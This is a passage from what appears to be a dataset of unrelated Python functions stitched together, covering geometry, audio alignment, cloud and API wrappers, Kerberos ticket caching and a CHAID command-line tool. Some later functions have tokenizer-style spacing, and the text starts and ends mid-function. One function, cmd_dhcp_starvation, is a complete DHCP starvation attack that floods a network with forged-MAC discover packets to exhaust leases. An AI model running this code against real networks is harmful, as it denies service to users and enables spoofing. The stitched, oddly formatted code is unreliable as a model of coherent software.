        print("Error: idx_num_to_name: {}".format(e))
    logger_jsons.info("exit idx_num_to_name")
    return L
|
def get_referenced_object_as_list(prev_obj, obj, dot_separated_name, desired_type=None):
    """Same as get_referenced_object, but always returns a list.

    Args:
        prev_obj: see get_referenced_object
        obj: see get_referenced_object
        dot_separated_name: see get_referenced_object
        desired_type: see get_referenced_object

    Returns:
        [] when the lookup yields None, the result itself when it is
        already a list, otherwise a one-element list wrapping the result.
    """
    res = get_referenced_object(prev_obj, obj, dot_separated_name, desired_type)
    if res is None:
        return []
    # isinstance (rather than an exact type() check) so list subclasses
    # are passed through unchanged as well.
    if isinstance(res, list):
        return res
    return [res]
|
def from_origin_axis_angle(origin, axis, angle, angle_in_radians=False):
    """Generate a SymmOp for a rotation about an arbitrary axis passing
    through an origin point.

    Args:
        origin (3x1 array): The origin which the axis passes through.
        axis (3x1 array): The axis of rotation in cartesian space. For
            example, [1, 0, 0] indicates rotation about the x-axis.
        angle (float): Angle of rotation.
        angle_in_radians (bool): Set to True if angles are given in
            radians. Or else, units of degrees are assumed.

    Returns:
        SymmOp.
    """
    theta = angle if angle_in_radians else angle * pi / 180
    a, b, c = origin[0], origin[1], origin[2]
    u, v, w = axis[0], axis[1], axis[2]
    # Intermediate quantities reused across the matrix entries.
    u2, v2, w2 = u * u, v * v, w * w
    cos_t = cos(theta)
    sin_t = sin(theta)
    l2 = u2 + v2 + w2
    l = sqrt(l2)
    # Affine rotation matrix (Rodrigues-style), assembled row by row;
    # the fourth column carries the translation induced by the origin.
    row1 = [
        (u2 + (v2 + w2) * cos_t) / l2,
        (u * v * (1 - cos_t) - w * l * sin_t) / l2,
        (u * w * (1 - cos_t) + v * l * sin_t) / l2,
        (a * (v2 + w2) - u * (b * v + c * w) + (u * (b * v + c * w) - a * (v2 + w2)) * cos_t + (b * w - c * v) * l * sin_t) / l2,
    ]
    row2 = [
        (u * v * (1 - cos_t) + w * l * sin_t) / l2,
        (v2 + (u2 + w2) * cos_t) / l2,
        (v * w * (1 - cos_t) - u * l * sin_t) / l2,
        (b * (u2 + w2) - v * (a * u + c * w) + (v * (a * u + c * w) - b * (u2 + w2)) * cos_t + (c * u - a * w) * l * sin_t) / l2,
    ]
    row3 = [
        (u * w * (1 - cos_t) - v * l * sin_t) / l2,
        (v * w * (1 - cos_t) + u * l * sin_t) / l2,
        (w2 + (u2 + v2) * cos_t) / l2,
        (c * (u2 + v2) - w * (a * u + b * v) + (w * (a * u + b * v) - c * (u2 + v2)) * cos_t + (a * v - b * u) * l * sin_t) / l2,
    ]
    return SymmOp([row1, row2, row3, [0, 0, 0, 1]])
|
def attribute(self):
    """Name of the attribute used as the reference getter.

    Extracted from ``refsDecl``: the last ``@attr='$N'`` pattern, where N
    is the number of ``$`` placeholders present in the declaration.
    """
    pattern = "\@([a-zA-Z:]+)=\\\?[\'\"]\$" + str(self.refsDecl.count("$")) + "\\\?[\'\"]"
    matches = re.findall(pattern, self.refsDecl)
    return matches[-1]
|
def _restore(name, fields, value):
    """Rebuild a namedtuple instance from its serialized parts.

    Classes are memoized in the module-level ``__cls`` cache so repeated
    restores of the same (name, fields) pair reuse a single class.
    """
    key = (name, fields)
    klass = __cls.get(key)
    if klass is None:
        klass = collections.namedtuple(name, fields)
        __cls[key] = klass
    return klass(*value)
|
def unlock(arguments):
    """Clear the site lock flag in the Redis database.

    :param arguments: CLI arguments (unused)
    :return: 0 on success
    """
    import redis
    redis_url = coil.utils.ask("Redis URL", "redis://localhost:6379/0")
    database = redis.StrictRedis.from_url(redis_url)
    database.set('site:lock', 0)
    print("Database unlocked.")
    return 0
|
def _detect(self, min_length, max_length, tail=False):
    """Detect the head or tail within ``min_length`` and ``max_length`` duration.

    If detecting the tail, the real wave MFCC and the query are reversed
    so that the tail detection problem reduces to a head detection problem.

    Return the duration of the head or tail, in seconds.

    :param min_length: estimated minimum length
    :type  min_length: :class:`~aeneas.exacttiming.TimeValue`
    :param max_length: estimated maximum length
    :type  max_length: :class:`~aeneas.exacttiming.TimeValue`
    :rtype: :class:`~aeneas.exacttiming.TimeValue`
    :raises: TypeError: if one of the parameters is not ``None`` or a number
    :raises: ValueError: if one of the parameters is negative
    """
    def _sanitize(value, default, name):
        # Apply the class default, coerce to TimeValue, and reject negative
        # durations; log_exc(..., True, ...) raises the given exception type.
        if value is None:
            value = default
        try:
            value = TimeValue(value)
        except (TypeError, ValueError, InvalidOperation) as exc:
            self.log_exc(u"The value of %s is not a number" % (name), exc, True, TypeError)
        if value < 0:
            self.log_exc(u"The value of %s is negative" % (name), None, True, ValueError)
        return value
    min_length = _sanitize(min_length, self.MIN_LENGTH, "min_length")
    max_length = _sanitize(max_length, self.MAX_LENGTH, "max_length")
    # Convert second-based bounds into MFCC frame counts using the MFCC
    # window shift (seconds per frame).
    mws = self.rconf.mws
    min_length_frames = int(min_length / mws)
    max_length_frames = int(max_length / mws)
    self.log([u"MFCC window shift s: %.3f", mws])
    self.log([u"Min start length s: %.3f", min_length])
    self.log([u"Min start length frames: %d", min_length_frames])
    self.log([u"Max start length s: %.3f", max_length])
    self.log([u"Max start length frames: %d", max_length_frames])
    self.log([u"Tail?: %s", str(tail)])
    self.log(u"Synthesizing query...")
    # Synthesize more audio than max_length (scaled by QUERY_FACTOR) so the
    # query wave fully covers the candidate region; synthesize the text
    # backwards when detecting a tail.
    synt_duration = max_length * self.QUERY_FACTOR
    self.log([u"Synthesizing at least %.3f seconds", synt_duration])
    tmp_handler, tmp_file_path = gf.tmp_file(suffix=u".wav", root=self.rconf[RuntimeConfiguration.TMP_PATH])
    synt = Synthesizer(rconf=self.rconf, logger=self.logger)
    anchors, total_time, synthesized_chars = synt.synthesize(self.text_file, tmp_file_path, quit_after=synt_duration, backwards=tail)
    self.log(u"Synthesizing query... done")
    self.log(u"Extracting MFCCs for query...")
    query_mfcc = AudioFileMFCC(tmp_file_path, rconf=self.rconf, logger=self.logger)
    self.log(u"Extracting MFCCs for query... done")
    self.log(u"Cleaning up...")
    gf.delete_file(tmp_handler, tmp_file_path)
    self.log(u"Cleaning up... done")
    # Limit the search to AUDIO_FACTOR times the maximum length, capped at
    # the real wave's own length.
    search_window = max_length * self.AUDIO_FACTOR
    search_window_end = min(int(search_window / mws), self.real_wave_mfcc.all_length)
    self.log([u"Query MFCC length (frames): %d", query_mfcc.all_length])
    self.log([u"Real MFCC length (frames): %d", self.real_wave_mfcc.all_length])
    self.log([u"Search window end (s): %.3f", search_window])
    self.log([u"Search window end (frames): %d", search_window_end])
    if tail:
        # Reversing both signals turns tail detection into head detection.
        self.log(u"Tail => reversing real_wave_mfcc and query_mfcc")
        self.real_wave_mfcc.reverse()
        query_mfcc.reverse()
    # NOTE: VAD will be run here, if not done before
    speech_intervals = self.real_wave_mfcc.intervals(speech=True, time=False)
    if len(speech_intervals) < 1:
        self.log(u"No speech intervals, hence no start found")
        if tail:
            # Restore the original orientation before returning.
            self.real_wave_mfcc.reverse()
        return TimeValue("0.000")
    # generate a list of begin indices: speech intervals whose start falls
    # inside [min_length_frames, max_length_frames]
    search_end = None
    candidates_begin = []
    for interval in speech_intervals:
        if (interval[0] >= min_length_frames) and (interval[0] <= max_length_frames):
            candidates_begin.append(interval[0])
        search_end = interval[1]
        if search_end >= search_window_end:
            break
    # for each begin index, compute the acm cost
    # to match the query
    # note that we take the min over the last column of the acm
    # meaning that we allow to match the entire query wave
    # against a portion of the real wave
    candidates = []
    for candidate_begin in candidates_begin:
        self.log([u"Candidate interval starting at %d == %.3f", candidate_begin, candidate_begin * mws])
        try:
            rwm = AudioFileMFCC(mfcc_matrix=self.real_wave_mfcc.all_mfcc[:, candidate_begin:search_end], rconf=self.rconf, logger=self.logger)
            dtw = DTWAligner(real_wave_mfcc=rwm, synt_wave_mfcc=query_mfcc, rconf=self.rconf, logger=self.logger)
            acm = dtw.compute_accumulated_cost_matrix()
            last_column = acm[:, -1]
            min_value = numpy.min(last_column)
            min_index = numpy.argmin(last_column)
            self.log([u"Candidate interval: %d %d == %.3f %.3f", candidate_begin, search_end, candidate_begin * mws, search_end * mws])
            self.log([u"  Min value: %.6f", min_value])
            self.log([u"  Min index: %d == %.3f", min_index, min_index * mws])
            candidates.append((min_value, candidate_begin, min_index))
        except Exception as exc:
            # Best-effort: a failing candidate is logged and skipped, not fatal.
            self.log_exc(u"An unexpected error occurred while running _detect", exc, False, None)
    # reverse again the real wave
    if tail:
        self.log(u"Tail => reversing real_wave_mfcc again")
        self.real_wave_mfcc.reverse()
    # return
    if len(candidates) < 1:
        self.log(u"No candidates found")
        return TimeValue("0.000")
    self.log(u"Candidates:")
    for candidate in candidates:
        self.log([u"  Value: %.6f Begin Time: %.3f Min Index: %d", candidate[0], candidate[1] * mws, candidate[2]])
    # Tuples sort lexicographically, so sorted()[0] is the candidate with
    # the lowest accumulated cost; element [1] is its begin frame index.
    best = sorted(candidates)[0][1]
    self.log([u"Best candidate: %d == %.3f", best, best * mws])
    return best * mws
|
def run_script(config, output_dir, accounts, tags, region, echo, serial, script_args):
    """Run an arbitrary script/command across the configured accounts.

    Each selected account/region pair executes the script (in parallel
    unless ``serial``), with success/failure logged per account.

    :param config: path to the accounts config file
    :param output_dir: directory for per-account output
    :param accounts: account name/id filters
    :param tags: account tag filters
    :param region: explicit region override (falls back to account regions)
    :param echo: if True, only print the command that would be run
    :param serial: if True, run sequentially and fail fast on errors
    :param script_args: the command and its arguments
    """
    # TODO count up on success/error/error list by account
    accounts_config, custodian_config, executor = init(config, None, serial, True, accounts, tags, (), ())
    if echo:
        print("command to run: `%s`" % (" ".join(script_args)))
        return
    # Support fully quoted scripts, which are common to avoid parameter
    # overlap with c7n-org run-script.
    if len(script_args) == 1 and " " in script_args[0]:
        script_args = script_args[0].split()
    with executor(max_workers=WORKER_COUNT) as w:
        futures = {}
        for a in accounts_config.get('accounts', ()):
            for r in resolve_regions(region or a.get('regions', ())):
                futures[w.submit(run_account_script, a, r, output_dir, serial, script_args)] = (a, r)
        for f in as_completed(futures):
            a, r = futures[f]
            if f.exception():
                if serial:
                    # BUG FIX: a bare `raise` here had no active exception
                    # (RuntimeError); raise the future's exception instead.
                    raise f.exception()
                log.warning("Error running script in %s @ %s exception: %s", a['name'], r, f.exception())
                # BUG FIX: previously fell through to f.result(), which
                # re-raised the exception even in non-serial mode; skip
                # to the next future instead.
                continue
            exit_code = f.result()
            if exit_code == 0:
                log.info("ran script on account:%s region:%s script: `%s`", a['name'], r, " ".join(script_args))
            else:
                log.info("error running script on account:%s region:%s script: `%s`", a['name'], r, " ".join(script_args))
|
def changeHS(self):
    """Change health system interventions.

    https://github.com/SwissTPH/openmalaria/wiki/GeneratedSchema32Doc#change-health-system

    Returns:
        list of [timestep, HealthSystem] pairs, one per timed deployment;
        an empty list when the scenario has no <changeHS> element.
    """
    health_systems = []
    change_hs = self.et.find("changeHS")
    if change_hs is None:
        return health_systems
    for health_system in change_hs.findall("timedDeployment"):
        # BUG FIX: Element.attrib is a dict, not a callable; calling
        # attrib("time") raised TypeError. Use item access instead.
        health_systems.append([int(health_system.attrib["time"]), HealthSystem(self.et)])
    return health_systems
|
def _get_colors(self, color_set, alpha, off_color, custom_colors={}):
    """Assign colors according to the surface energies of on_wulff facets.

    Facets not on the Wulff shape keep ``off_color``; facets on the shape
    are colored from a colormap normalized over their surface energies,
    unless overridden via ``custom_colors``.

    :param color_set: matplotlib colormap name
    :param alpha: alpha blending value applied to facet colors
    :param off_color: color for facets that are not on the Wulff shape
    :param custom_colors: {miller_index_tuple: color} overrides
        (NOTE: mutable default argument — shared across calls; harmless
        here only because it is never mutated)
    :return: (color_list, color_proxy, color_proxy_on_wulff,
        miller_on_wulff, e_surf_on_wulff_list)
    """
    import matplotlib as mpl
    import matplotlib.pyplot as plt
    color_list = [off_color] * len(self.hkl_list)
    color_proxy_on_wulff = []
    miller_on_wulff = []
    # (index, energy) pairs restricted to facets that appear on the shape.
    e_surf_on_wulff = [(i, e_surf) for i, e_surf in enumerate(self.e_surf_list) if self.on_wulff[i]]
    c_map = plt.get_cmap(color_set)
    e_surf_on_wulff.sort(key=lambda x: x[1], reverse=False)
    e_surf_on_wulff_list = [x[1] for x in e_surf_on_wulff]
    if len(e_surf_on_wulff) > 1:
        cnorm = mpl.colors.Normalize(vmin=min(e_surf_on_wulff_list), vmax=max(e_surf_on_wulff_list))
    else:
        # if there is only one hkl on wulff, choose the color of the median
        cnorm = mpl.colors.Normalize(vmin=min(e_surf_on_wulff_list) - 0.1, vmax=max(e_surf_on_wulff_list) + 0.1)
    scalar_map = mpl.cm.ScalarMappable(norm=cnorm, cmap=c_map)
    for i, e_surf in e_surf_on_wulff:
        color_list[i] = scalar_map.to_rgba(e_surf, alpha=alpha)
        # Explicit user-provided colors take precedence over the colormap.
        if tuple(self.miller_list[i]) in custom_colors.keys():
            color_list[i] = custom_colors[tuple(self.miller_list[i])]
        color_proxy_on_wulff.append(plt.Rectangle((2, 2), 1, 1, fc=color_list[i], alpha=alpha))
        miller_on_wulff.append(self.input_miller_fig[i])
    scalar_map.set_array([x[1] for x in e_surf_on_wulff])
    # Proxy rectangles serve as legend handles.
    color_proxy = [plt.Rectangle((2, 2), 1, 1, fc=x, alpha=alpha) for x in color_list]
    return color_list, color_proxy, color_proxy_on_wulff, miller_on_wulff, e_surf_on_wulff_list
|
def get_self_uri(self, content_type):
    """Return the first self-uri with the given content_type, or None."""
    matching = (uri for uri in self.self_uri_list if uri.content_type == content_type)
    return next(matching, None)
|
def text_to_speech(text, synthesizer, synth_args, sentence_break):
    """Convert *text* into a pydub AudioSegment using a speech synthesizer.

    At the moment, IBM Watson's text-to-speech API is the only available
    synthesizer. Text longer than 50 words is synthesized sentence by
    sentence (split on ``sentence_break``) and the segments concatenated.

    :param text: the text to synthesize
    :param synthesizer: synthesizer name; only 'watson' is supported
    :param synth_args: dict of synthesizer arguments (e.g. credentials)
    :param sentence_break: delimiter marking logical breaks in the text
    """
    if synthesizer != 'watson':
        raise ValueError('"' + synthesizer + '" synthesizer not found.')

    def _synthesize_chunk(chunk, tmp_path):
        # Watson returns WAV bytes; round-trip through a temp file so pydub
        # can load it, then clean the file up.
        with open(tmp_path, 'wb') as tmp:
            tmp.write(watson_request(text=chunk, synth_args=synth_args).content)
        segment = AudioSegment.from_wav(tmp_path)
        os.remove(tmp_path)
        return segment

    if len(text.split()) < 50:
        return _synthesize_chunk(text, '.temp.wav')
    segments = [
        _synthesize_chunk(sentence, '.temp' + str(i) + '.wav')
        for i, sentence in enumerate(text.split(sentence_break))
    ]
    combined = segments[0]
    for extra in segments[1:]:
        combined = combined + extra
    return combined
|
def check_need_install():
    """Return True when the installed copy differs from this source tree.

    Walks SRC (skipping ``__pycache__`` contents), comparing each file's
    md5 with its counterpart under DST; a missing or differing file means
    installation is needed.
    """
    for dirpath, _, filenames in os.walk(SRC):
        if os.path.basename(dirpath) == "__pycache__":
            continue
        for filename in filenames:
            source_path = os.path.join(dirpath, filename)
            target_path = os.path.join(dirpath.replace(SRC, DST), filename)
            if not os.path.exists(target_path):
                return True
            if md5_of_file(source_path) != md5_of_file(target_path):
                return True
    return False
|
def func_globals_inject(func, **overrides):
    '''Override specific variables within a function's global context.

    Generator intended to be used as a context manager (wrapped with
    ``contextlib.contextmanager`` at the decoration site): the overrides
    are applied before the ``yield`` and reverted afterwards.

    :param func: function (or bound method) whose ``__globals__`` are patched
    :param overrides: name -> value mapping injected into the globals
    '''
    # recognize methods: unwrap to the underlying function object
    if hasattr(func, 'im_func'):
        func = func.__func__
    # Get a reference to the function globals dictionary
    func_globals = func.__globals__
    # Record which names are brand new (to delete later) and which ones are
    # overwritten (to restore their previous values).
    injected_func_globals = []
    overridden_func_globals = {}
    for override in overrides:
        if override in func_globals:
            overridden_func_globals[override] = func_globals[override]
        else:
            injected_func_globals.append(override)
    # Override the function globals with what's passed in the above overrides
    func_globals.update(overrides)
    try:
        # The context is now ready to be used
        yield
    finally:
        # BUG FIX: restore even when the managed body raises, so the
        # function's globals are never left in a patched state.
        func_globals.update(overridden_func_globals)
        # Remove any entry injected in the function globals
        for injected in injected_func_globals:
            del func_globals[injected]
|
def zone_delete(name, resource_group, **kwargs):
    '''
    .. versionadded:: Fluorine

    Delete a DNS zone within a resource group.

    :param name: The name of the DNS zone to delete.
    :param resource_group: The name of the resource group.

    CLI Example:

    .. code-block:: bash

        salt-call azurearm_dns.zone_delete myzone testgroup
    '''
    dnsconn = __utils__['azurearm.get_client']('dns', **kwargs)
    try:
        poller = dnsconn.zones.delete(zone_name=name, resource_group_name=resource_group, if_match=kwargs.get('if_match'))
        poller.wait()
        return True
    except CloudError as exc:
        __utils__['azurearm.log_cloud_error']('dns', str(exc), **kwargs)
        return False
|
def In(self, *values):
    """Set the WHERE clause type to "in".

    Args:
        *values: The values to be used in the WHERE condition.

    Returns:
        The query builder that this WHERE builder links to.
    """
    condition = self._CreateMultipleValuesCondition(values, 'IN')
    self._awql = condition
    return self._query_builder
|
def createArgumentParser(description):
    """Build an argparse parser that uses the project's sorted help formatter.

    :param description: help text shown at the top of the usage output
    :return: configured argparse.ArgumentParser
    """
    return argparse.ArgumentParser(description=description, formatter_class=SortedHelpFormatter)
|
def call(self, command, *args):
    """Forward an arbitrary command to the coin daemon over RPC.

    Args:
        command (str): command to send; coerced to str before dispatch
        *args: positional arguments forwarded verbatim
    """
    command_name = str(command)
    return self.rpc.call(command_name, *args)
|
def store_password(params, password):
    """Store the password for a database connection using :mod:`keyring`.

    Uses the ``user`` field as the user name and ``<host>:<driver>`` as the
    keyring service name.

    Args:
        params (dict): database configuration, as defined in :mod:`ozelot.config`
        password (str): password to store
    """
    keyring.set_password(
        service_name=params['host'] + ':' + params['driver'],
        username=params['user'],
        password=password,
    )
|
def get_default(self, section, option):
    """Return the default value registered for (section, option).

    Useful for type checking in the 'get' method. Returns ``NoDefault``
    when the section is known but carries no default for ``option``;
    falls through (implicit None) when no matching section exists.
    """
    section = self._check_section_option(section, option)
    for default_section, default_options in self.defaults:
        if default_section != section:
            continue
        if option in default_options:
            return default_options[option]
        return NoDefault
|
def _proxy(self):
    """Lazily build and cache the context used to proxy instance actions.

    :returns: FlowContext for this FlowInstance
    :rtype: twilio.rest.studio.v1.flow.FlowContext
    """
    context = self._context
    if context is None:
        context = FlowContext(self._version, sid=self._solution['sid'], )
        self._context = context
    return context
|
def decode_tag(stream):
    """Read a two-byte tag from *stream* and return the tag byte.

    The first byte is reserved and must be null.

    :param stream: Source data stream
    :type stream: io.BytesIO
    :returns: Decoded tag
    :rtype: bytes
    :raises DeserializationError: if the reserved byte is not null
    """
    reserved, tag = unpack_value(">cc", stream)
    if reserved == b"\x00":
        return tag
    raise DeserializationError("Invalid tag: reserved byte is not null")
|
def add_kirbi(self, krbcred, override_pp=True, include_expired=False):
    """Append the single ticket stored in a KRB-CRED (kirbi) structure to
    this credential cache.

    :param krbcred: parsed KRB-CRED (asn1crypto) object; a kirbi file
        carries exactly one ticket
    :param override_pp: when True, the ticket's client principal becomes
        the cache's primary principal
    :param include_expired: currently unused; consumed only by the
        disabled expiry check kept below for reference
    """
    c = Credential()
    enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
    ticket_info = enc_credinfo['ticket-info'][0]
    # Disabled expiry filtering, kept verbatim for reference:
    """if ticket _ info [ ' endtime ' ] < datetime . datetime . now ( datetime . timezone . utc ) :
    if include _ expired = = True :
    logging . debug ( ' This ticket has most likely expired , but include _ expired is forcing me to add it to cache ! This can cause problems ! ' )
    else :
    logging . debug ( ' This ticket has most likely expired , skipping ' )
    return"""
    c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
    if override_pp == True:
        self.primary_principal = c.client
    # Workaround: if the sname name-string also carries the realm as its
    # last component, impacket fails to parse it, so trim that component.
    if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
        logging.debug('SNAME contains the realm as well, trimming it')
        t = ticket_info['sname']
        t['name-string'] = t['name-string'][:-1]
        c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
    else:
        c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
    c.time = Times.from_asn1(ticket_info)
    c.key = Keyblock.from_asn1(ticket_info['key'])
    # not sure!
    c.is_skey = 0
    c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
    c.num_address = 0
    c.num_authdata = 0
    # kirbi only stores one ticket per file
    c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump())
    c.second_ticket = CCACHEOctetString.empty()
    self.credentials.append(c)
|
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose):
    """Send multiple DHCP requests from forged MAC addresses to
    fill the DHCP server leases.

    When all the available network addresses are assigned, the DHCP server
    doesn't send responses, enabling attacks such as DHCP spoofing.
    Runs until interrupted.

    # habu.dhcp_starvation
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP
    """
    conf.verb = False
    if iface:
        conf.iface = iface
    conf.checkIPaddr = False
    # Static layers shared by every discover packet.
    eth_layer = Ether(dst="ff:ff:ff:ff:ff:ff")
    ip_layer = IP(src="0.0.0.0", dst="255.255.255.255")
    udp_layer = UDP(sport=68, dport=67)
    dhcp_layer = DHCP(options=[("message-type", "discover"), "end"])
    # Loop forever; press CTRL-C after several seconds to stop.
    while True:
        # Fresh random MAC per discover so each one claims a new lease.
        bootp_layer = BOOTP(chaddr=str(RandMAC()))
        dhcp_discover = eth_layer / ip_layer / udp_layer / bootp_layer / dhcp_layer
        ans, unans = srp(dhcp_discover, timeout=1)
        for _, reply in ans:
            if verbose:
                print(reply.show())
            else:
                print(reply.sprintf(r"%IP.src% offers %BOOTP.yiaddr%"))
        sleep(sleeptime)
|
def text_to_url(self, text):
    """Convert a text address into a QUrl object rooted at home_url."""
    relative = text[1:] if text.startswith('/') else text
    return QUrl(self.home_url.toString() + relative + '.html')
|
def commit(self, message, parent_commits=None, head=True, author=None, committer=None, author_date=None, commit_date=None, skip_hooks=False):
    """Commit the current default index file, creating a commit object.

    For more information on the arguments, see tree.commit.

    :note: If you have manually altered the .entries member of this instance,
        don't forget to write() your changes to disk beforehand.
        Passing skip_hooks=True is the equivalent of using `-n`
        or `--no-verify` on the command line.
    :return: Commit object representing the new commit
    """
    if not skip_hooks:
        # pre-commit runs before the message is finalized; the commit-msg
        # hook may rewrite the message file, so re-read it afterwards.
        run_commit_hook('pre-commit', self)
        self._write_commit_editmsg(message)
        run_commit_hook('commit-msg', self, self._commit_editmsg_filepath())
        message = self._read_commit_editmsg()
        self._remove_commit_editmsg()
    tree = self.write_tree()
    rval = Commit.create_from_tree(self.repo, tree, message, parent_commits, head, author=author, committer=committer, author_date=author_date, commit_date=commit_date)
    if not skip_hooks:
        # post-commit runs only after the commit object exists.
        run_commit_hook('post-commit', self)
    return rval
|
def loadSettings(self):
    """Restore the window geometry previously saved in self.settings."""
    settings = self.settings
    settings.beginGroup('rampviewer')
    saved_geometry = settings.value('geometry').toByteArray()
    settings.endGroup()
    self.restoreGeometry(saved_geometry)
|
def main():
    """Entry point when module is run from command line.

    Parses CLI arguments, loads the input file (.csv or .sav), builds a
    CHAID tree, and prints the requested output: classification column,
    prediction column, classification rules, or the rendered tree with
    its accuracy.
    """
    parser = argparse.ArgumentParser(description='Run the chaid algorithm on a' ' csv/sav file.')
    parser.add_argument('file')
    parser.add_argument('dependent_variable', nargs=1)
    parser.add_argument('--dependent-variable-type', type=str)
    var = parser.add_argument_group('Independent Variable Specification')
    var.add_argument('nominal_variables', nargs='*', help='The names of ' 'independent variables to use that have no intrinsic ' 'order to them')
    var.add_argument('--ordinal-variables', type=str, nargs='*', help='The names of independent variables to use that ' 'have an intrinsic order but a finite amount of states')
    parser.add_argument('--weights', type=str, help='Name of weight column')
    parser.add_argument('--max-depth', type=int, help='Max depth of generated ' 'tree')
    parser.add_argument('--min-parent-node-size', type=int, help='Minimum number of ' 'samples required to split the parent node')
    parser.add_argument('--min-child-node-size', type=int, help='Minimum number of ' 'samples required to split the child node')
    parser.add_argument('--alpha-merge', type=float, help='Alpha Merge')
    # Output modes are mutually exclusive.
    group = parser.add_mutually_exclusive_group(required=False)
    group.add_argument('--classify', action='store_true', help='Add column to' ' input with the node id of the node that that ' 'respondent has been placed into')
    group.add_argument('--predict', action='store_true', help='Add column to ' 'input with the value of the dependent variable that ' 'the majority of respondents in that node selected')
    group.add_argument('--rules', action='store_true')
    group.add_argument('--export', action='store_true', help='Whether to export the chart to pdf/dot')
    group.add_argument('--export-path', type=str, help='Path to store chart output')
    nspace = parser.parse_args()
    # Load the dataset: CSV directly, SPSS .sav via savReaderWriter.
    if nspace.file[-4:] == '.csv':
        data = pd.read_csv(nspace.file)
    elif nspace.file[-4:] == '.sav':
        import savReaderWriter as spss
        raw_data = spss.SavReader(nspace.file, returnHeader=True)
        raw_data_list = list(raw_data)
        data = pd.DataFrame(raw_data_list)
        # The first row holds the column names; promote it to the header.
        data = data.rename(columns=data.loc[0]).iloc[1:]
    else:
        print('Unknown file type')
        exit(1)
    # Collect only the explicitly supplied tree hyper-parameters.
    config = {}
    if nspace.max_depth:
        config['max_depth'] = nspace.max_depth
    if nspace.alpha_merge:
        config['alpha_merge'] = nspace.alpha_merge
    if nspace.min_parent_node_size:
        config['min_parent_node_size'] = nspace.min_parent_node_size
    if nspace.min_child_node_size:
        config['min_child_node_size'] = nspace.min_child_node_size
    if nspace.weights:
        config['weight'] = nspace.weights
    if nspace.dependent_variable_type:
        config['dep_variable_type'] = nspace.dependent_variable_type
    ordinal = nspace.ordinal_variables or []
    nominal = nspace.nominal_variables or []
    independent_variables = nominal + ordinal
    # Map each independent variable name to its measurement level.
    types = dict(zip(nominal + ordinal, ['nominal'] * len(nominal) + ['ordinal'] * len(ordinal)))
    if len(independent_variables) == 0:
        print('Need to provide at least one independent variable')
        exit(1)
    tree = Tree.from_pandas_df(data, types, nspace.dependent_variable[0], **config)
    if nspace.export or nspace.export_path:
        tree.render(nspace.export_path, True)
    if nspace.classify:
        # Append the terminal-node id assigned to every row.
        predictions = pd.Series(tree.node_predictions())
        predictions.name = 'node_id'
        data = pd.concat([data, predictions], axis=1)
        print(data.to_csv())
    elif nspace.predict:
        # Append the majority dependent-variable value of each row's node.
        predictions = pd.Series(tree.model_predictions())
        predictions.name = 'predicted'
        data = pd.concat([data, predictions], axis=1)
        print(data.to_csv())
    elif nspace.rules:
        print('\n'.join(str(x) for x in tree.classification_rules()))
    else:
        tree.print_tree()
        print('Accuracy: ', tree.accuracy())
|
def update(self, role_sid=values.unset, attributes=values.unset, friendly_name=values.unset):
    """Update the UserInstance via its proxy context.

    :param unicode role_sid: The SID id of the Role assigned to this user
    :param unicode attributes: A valid JSON string that contains application-specific data
    :param unicode friendly_name: A string to describe the resource

    :returns: Updated UserInstance
    :rtype: twilio.rest.chat.v2.service.user.UserInstance
    """
    updated_fields = {
        'role_sid': role_sid,
        'attributes': attributes,
        'friendly_name': friendly_name,
    }
    return self._proxy.update(**updated_fields)
|
def scopes(self, **kwargs):
    """Scopes associated to the team, fetched through the client.

    Extra keyword arguments are forwarded to the underlying client call.
    """
    client = self._client
    return client.scopes(team=self.id, **kwargs)
|
def element_should_exist(self, json_string, expr):
    """Check the existence of one or more elements matching a
    [http://jsonselect.org/|JSONSelect] expression.

    *DEPRECATED* The JSONSelect query language is outdated and no longer
    supported; use the other keywords of this library to query JSON.

    *Args:*\n
        _json_string_ - JSON string;\n
        _expr_ - JSONSelect expression;\n

    *Raises:*\n
        JsonValidatorError

    *Example:*\n
    | *Settings* | *Value* |
    | Library    | JsonValidator |
    | Library    | OperatingSystem |
    | *Test Cases* | *Action* | *Argument* | *Argument* |
    | Check element | ${json_example}= | OperatingSystem.Get File | ${CURDIR}${/}json_example.json |
    | | Element should exist | ${json_example} | .author:contains("Evelyn Waugh") |
    | | Element should exist | ${json_example} | .store.book .price:expr(x=8.95) |
    """
    matches = self.select_elements(json_string, expr)
    # select_elements signals "no element matched" with None.
    if matches is None:
        raise JsonValidatorError('Elements %s does not exist' % expr)
|
def generate ( organization , package , destination ) :
"""Generates the Sphinx configuration and Makefile .
Args :
organization ( str ) : the organization name .
package ( str ) : the package to be documented .
destination ( str ) : the destination directory ."""
|
gen = ResourceGenerator ( organization , package )
tmp = tempfile . NamedTemporaryFile ( mode = 'w+t' , delete = False )
try :
tmp . write ( gen . conf ( ) )
finally :
tmp . close ( )
shutil . copy ( tmp . name , os . path . join ( destination , 'conf.py' ) )
tmp = tempfile . NamedTemporaryFile ( mode = 'w+t' , delete = False )
try :
tmp . write ( gen . makefile ( ) )
finally :
tmp . close ( )
shutil . copy ( tmp . name , os . path . join ( destination , 'Makefile' ) )
|
def _to_dict ( self ) :
"""Return a json dictionary representing this model ."""
|
_dict = { }
if hasattr ( self , 'global_' ) and self . global_ is not None :
_dict [ 'global' ] = self . global_ . _to_dict ( )
if hasattr ( self , 'skills' ) and self . skills is not None :
_dict [ 'skills' ] = self . skills . _to_dict ( )
return _dict
|
def _method_ ( name ) :
"""getter factory"""
|
def _getter_ ( self ) :
return getattr ( self , self . get_private_name ( name ) )
return _getter_
|
def get_data(name, train_batch_size, test_batch_size):
    """Gets training and testing dataset iterators.

    Args:
        name: String. Name of dataset, either 'mnist' or 'cifar10'.
        train_batch_size: Integer. Batch size for training.
        test_batch_size: Integer. Batch size for testing.

    Returns:
        Dict containing:
